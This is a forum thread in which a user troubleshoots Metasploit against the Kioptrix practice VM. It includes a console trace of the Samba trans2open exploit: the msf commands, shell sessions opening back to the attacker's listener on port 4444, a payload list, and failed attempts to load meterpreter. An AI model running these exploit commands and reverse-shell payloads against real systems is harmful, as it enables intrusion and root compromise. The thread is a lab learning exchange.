Results 1 to 6 of 6

Thread: Metasploit meterpreter

  1. #1
    Join Date
    2013-Mar
    Location
    Canada
    Posts
    31

    Metasploit meterpreter

    so i created a vm and put kioptrix
    ran metasploit and used the samba exploit (exploit/linux/samba/trans2open)

    it was successfull
    then tried to use meterpreter however it would not connect

    i was able to get the shell session but not meterpreter
    no errors, it just keeps on trying

    anyone had simular issues?
    “A goal without a plan is just a wish.”

  2. #2
    Join Date
    2013-Apr
    Posts
    126
    Can you show us a trace of what you did exactly and the output so we can have a better idea on your problem.

  3. #3
    Join Date
    2013-Mar
    Location
    Canada
    Posts
    31
    msf > use exploit/linux/samba/trans2open

    msf exploit(trans2open) > set RHOST 192.168.1.108
    RHOST => 192.168.1.108
    msf exploit(trans2open) > show options

    Module options (exploit/linux/samba/trans2open):

    Name Current Setting Required Description
    ---- --------------- -------- -----------
    RHOST 192.168.1.108 yes The target address
    RPORT 139 yes The target port


    Exploit target:

    Id Name
    -- ----
    0 Samba 2.2.x - Bruteforce


    msf exploit(trans2open) >
    msf exploit(trans2open) > sessions

    Active sessions
    ===============

    No active sessions.

    msf exploit(trans2open) > exploit
    [*] Started reverse handler on 192.168.1.140:4444
    [*] Trying return address 0xbffffdfc...
    [*] Trying return address 0xbffffcfc...
    [*] Trying return address 0xbffffbfc...
    [*] Trying return address 0xbffffafc...
    [*] Trying return address 0xbffff9fc...
    [*] Command shell session 1 opened (192.168.1.140:4444 -> 192.168.1.108:32769) at 2013-05-20 10:34:05 -0400
    [*] Command shell session 2 opened (192.168.1.140:4444 -> 192.168.1.108:32770) at 2013-05-20 10:34:06 -0400


    exit
    [*] 192.168.1.108 - Command shell session 2 closed. Reason: Died from EOFError
    msf exploit(trans2open) > show payloads

    Compatible Payloads
    ===================

    Name Disclosure Date Rank Description
    ---- --------------- ---- -----------
    generic/custom normal Custom Payload
    generic/debug_trap normal Generic x86 Debug Trap
    generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
    generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
    generic/tight_loop normal Generic x86 Tight Loop
    linux/x86/adduser normal Linux Add User
    linux/x86/chmod normal Linux Chmod
    linux/x86/exec normal Linux Execute Command
    linux/x86/meterpreter/bind_ipv6_tcp normal Linux Meterpreter, Bind TCP Stager (IPv6)
    linux/x86/meterpreter/bind_nonx_tcp normal Linux Meterpreter, Bind TCP Stager
    linux/x86/meterpreter/bind_tcp normal Linux Meterpreter, Bind TCP Stager
    linux/x86/meterpreter/reverse_ipv6_tcp normal Linux Meterpreter, Reverse TCP Stager (IPv6)
    linux/x86/meterpreter/reverse_nonx_tcp normal Linux Meterpreter, Reverse TCP Stager
    linux/x86/meterpreter/reverse_tcp normal Linux Meterpreter, Reverse TCP Stager
    linux/x86/metsvc_bind_tcp normal Linux Meterpreter Service, Bind TCP
    linux/x86/metsvc_reverse_tcp normal Linux Meterpreter Service, Reverse TCP Inline
    linux/x86/read_file normal Linux Read File
    linux/x86/shell/bind_ipv6_tcp normal Linux Command Shell, Bind TCP Stager (IPv6)
    linux/x86/shell/bind_nonx_tcp normal Linux Command Shell, Bind TCP Stager
    linux/x86/shell/bind_tcp normal Linux Command Shell, Bind TCP Stager
    linux/x86/shell/reverse_ipv6_tcp normal Linux Command Shell, Reverse TCP Stager (IPv6)
    linux/x86/shell/reverse_nonx_tcp normal Linux Command Shell, Reverse TCP Stager
    linux/x86/shell/reverse_tcp normal Linux Command Shell, Reverse TCP Stager
    linux/x86/shell_bind_ipv6_tcp normal Linux Command Shell, Bind TCP Inline (IPv6)
    linux/x86/shell_bind_tcp normal Linux Command Shell, Bind TCP Inline
    linux/x86/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
    linux/x86/shell_reverse_tcp2 normal Linux Command Shell, Reverse TCP Inline - Metasm Demo

    msf exploit(trans2open) > set payload linux/x86/meterpreter/bind_tcp
    payload => linux/x86/meterpreter/bind_tcp
    msf exploit(trans2open) > show options

    Module options (exploit/linux/samba/trans2open):

    Name Current Setting Required Description
    ---- --------------- -------- -----------
    RHOST 192.168.1.108 yes The target address
    RPORT 139 yes The target port


    Payload options (linux/x86/meterpreter/bind_tcp):

    Name Current Setting Required Description
    ---- --------------- -------- -----------
    DebugOptions 0 no Debugging options for POSIX meterpreter
    LPORT 4444 yes The listen port
    PrependFork no Add a fork() / exit_group() (for parent) code
    RHOST 192.168.1.108 no The target address


    Exploit target:

    Id Name
    -- ----
    0 Samba 2.2.x - Bruteforce


    now when i run exploit i get the following...it keeps on going with trying to find a return address



    msf exploit(trans2open) > exploit
    [*] Started bind handler
    [*] Trying return address 0xbffffdfc...
    [*] Trying return address 0xbffffcfc...
    [*] Trying return address 0xbffffbfc...
    [*] Trying return address 0xbffffafc...
    [*] Transmitting intermediate stager for over-sized stage...(100 bytes)
    [*] Trying return address 0xbffff9fc...
    [*] Sending stage (1126400 bytes) to 192.168.1.108
    [*] Trying return address 0xbffff8fc...
    [*] Trying return address 0xbffff7fc...
    [*] Trying return address 0xbffff6fc...
    [*] Trying return address 0xbffff5fc...
    [*] Trying return address 0xbffff4fc...
    [*] Trying return address 0xbffff3fc...
    [*] Trying return address 0xbffff2fc...
    [*] Trying return address 0xbffff1fc...
    [*] Trying return address 0xbffff0fc...
    [*] Trying return address 0xbfffeffc...
    [*] Trying return address 0xbfffeefc...
    [*] Trying return address 0xbfffedfc...
    [*] Trying return address 0xbfffecfc...
    [*] Trying return address 0xbfffebfc...
    [*] Trying return address 0xbfffeafc...
    [*] Trying return address 0xbfffe9fc...
    [*] Trying return address 0xbfffe8fc...
    [*] Trying return address 0xbfffe7fc...
    [*] Trying return address 0xbfffe6fc...
    Last edited by nix; 2013-05-20 at 14:43.
    “A goal without a plan is just a wish.”

  4. #4
    Join Date
    2013-Mar
    Location
    Canada
    Posts
    31
    i even tried the Payload options (linux/x86/meterpreter/reverse_tcp):

    and set the LHOST to my machine but i get the same thing

    i'm able to get a shell and i'm fully logged in to the system as root but i can't get meterpreter to work.
    “A goal without a plan is just a wish.”

  5. #5
    Join Date
    2013-Apr
    Posts
    126
    Looks like the shellcode is somehow broken, try to play with the encoders to use at run-time. Not sure if this will solve the problem.

  6. #6
    Join Date
    2013-Mar
    Location
    Canada
    Posts
    31
    i'm not sure i understand...what do you mean the shellcode is broken? do you mean the payload?

    thanks

    Nix
    “A goal without a plan is just a wish.”

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •